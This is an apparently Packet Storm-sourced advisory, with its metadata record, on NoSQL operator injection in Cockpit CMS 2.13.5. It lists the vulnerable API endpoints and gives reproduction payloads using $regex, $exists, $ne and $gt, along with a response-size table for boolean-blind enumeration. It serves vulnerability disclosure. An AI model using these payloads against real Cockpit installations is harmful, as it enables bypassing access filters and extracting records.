📄 Cockpit CMS 2.13.5 NoSQL Injection_PACKETSTORM:218786

Description

Cockpit CMS version 2.13.5 is vulnerable to NoSQL operator injection on multiple API endpoints. User-supplied filter objects are forwarded to the Mongolite query engine without stripping MongoDB operators. Authenticated users can bypass intended query...

Visit Original Source

Basic Information

ID PACKETSTORM:218786

Published Apr 13, 2026 at 00:00

Affected Product

Affected Versions Cockpit CMS 2.13.5 NoSQL Injection

Description:
Cockpit CMS 2.13.5 is vulnerable to NoSQL operator injection on multiple
API endpoints. User-supplied filter objects are forwarded to the Mongolite
query engine without stripping MongoDB operators ($ne, $gt, $regex,
$exists). Authenticated users can bypass intended query filters and perform
boolean-based blind queries against fields the application does not expose
through its UI.

Source URL: https://github.com/Cockpit-HQ/Cockpit
Software URL: https://getcockpit.com/

Affected Endpoints:
- POST /content/collection/find/{model} (options.filter)
- GET /api/content/items/{model} (filter)
- POST /system/users/load (filter)
- POST /system/logs/load (filter)

Steps to Reproduce:

1. Log in to Cockpit CMS 2.13.5 and capture the session cookie and
X-CSRF-Token.

2. Baseline request (no filter) on /content/collection/find/{model}:
{"options":{"limit":100}}
Response: all items.

3. Inject MongoDB operator:
{"options":{"filter":{"title":{"$regex":"^S"}},"limit":100}}
Response: only items whose title begins with "S". Operator executed
server-side.

4. Boolean-blind confirmation — TRUE condition:
{"options":{"filter":{"_id":{"$exists":true}},"limit":100}}
Response: full set.

FALSE condition:
{"options":{"filter":{"title":{"$regex":"^IMPOSSIBLEXYZ$"}},"limit":100}}
Response: empty set.

Evidence matrix (baseline vs injected, /content/collection/find/sinktest):
No filter: 7 items, 1958 bytes
$ne exclusion: 6 items, 1656 bytes
$regex ^S: 2 items, 644 bytes
$regex impossible: 0 items, 41 bytes
$gt comparison: 4 items, 1088 bytes

Impact:
- Authenticated users bypass intended query filters and can access records
through operator injection that the UI does not permit.
- Boolean-based blind queries are possible via differences in response
size, which could in principle be used to enumerate field contents against
any filter-reachable field.
- RBAC that relies on query filters rather than explicit authorization
checks can be bypassed.

Disclosure Timeline:
- Public disclosure to Packet Storm: 2026-04-12

{
    "lastseen": "2026-04-13T16:20:20",
    "description": "Cockpit CMS version 2.13.5 is vulnerable to NoSQL operator injection on multiple API endpoints. User-supplied filter objects are forwarded to the Mongolite query engine without stripping MongoDB operators. Authenticated users can bypass intended query...",
    "published": "2026-04-13T00:00:00",
    "modified": "2026-04-13T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Cockpit CMS 2.13.5 NoSQL Injection",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:218786",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "Cockpit CMS 2.13.5 NoSQL Injection\n    \n    Description:\n    Cockpit CMS 2.13.5 is vulnerable to NoSQL operator injection on multiple\n    API endpoints. User-supplied filter objects are forwarded to the Mongolite\n    query engine without stripping MongoDB operators ($ne, $gt, $regex,\n    $exists). Authenticated users can bypass intended query filters and perform\n    boolean-based blind queries against fields the application does not expose\n    through its UI.\n    \n    Source URL: https://github.com/Cockpit-HQ/Cockpit\n    Software URL: https://getcockpit.com/\n    \n    Affected Endpoints:\n    - POST /content/collection/find/{model}  (options.filter)\n    - GET  /api/content/items/{model}        (filter)\n    - POST /system/users/load                (filter)\n    - POST /system/logs/load                 (filter)\n    \n    Steps to Reproduce:\n    \n    1. Log in to Cockpit CMS 2.13.5 and capture the session cookie and\n    X-CSRF-Token.\n    \n    2. Baseline request (no filter) on /content/collection/find/{model}:\n       {\"options\":{\"limit\":100}}\n       Response: all items.\n    \n    3. Inject MongoDB operator:\n       {\"options\":{\"filter\":{\"title\":{\"$regex\":\"^S\"}},\"limit\":100}}\n       Response: only items whose title begins with \"S\". Operator executed\n    server-side.\n    \n    4. Boolean-blind confirmation \u2014 TRUE condition:\n       {\"options\":{\"filter\":{\"_id\":{\"$exists\":true}},\"limit\":100}}\n       Response: full set.\n    \n       FALSE condition:\n       {\"options\":{\"filter\":{\"title\":{\"$regex\":\"^IMPOSSIBLEXYZ$\"}},\"limit\":100}}\n       Response: empty set.\n    \n    Evidence matrix (baseline vs injected, /content/collection/find/sinktest):\n    No filter:            7 items, 1958 bytes\n    $ne exclusion:        6 items, 1656 bytes\n    $regex ^S:            2 items,  644 bytes\n    $regex impossible:    0 items,   41 bytes\n    $gt comparison:       4 items, 1088 bytes\n    \n    Impact:\n    - Authenticated users bypass intended query filters and can access records\n    through operator injection that the UI does not permit.\n    - Boolean-based blind queries are possible via differences in response\n    size, which could in principle be used to enumerate field contents against\n    any filter-reachable field.\n    - RBAC that relies on query filters rather than explicit authorization\n    checks can be bypassed.\n    \n    Disclosure Timeline:\n    - Public disclosure to Packet Storm: 2026-04-12",
    "sourceHref": "https://packetstorm.news/download/218786",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/218786/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply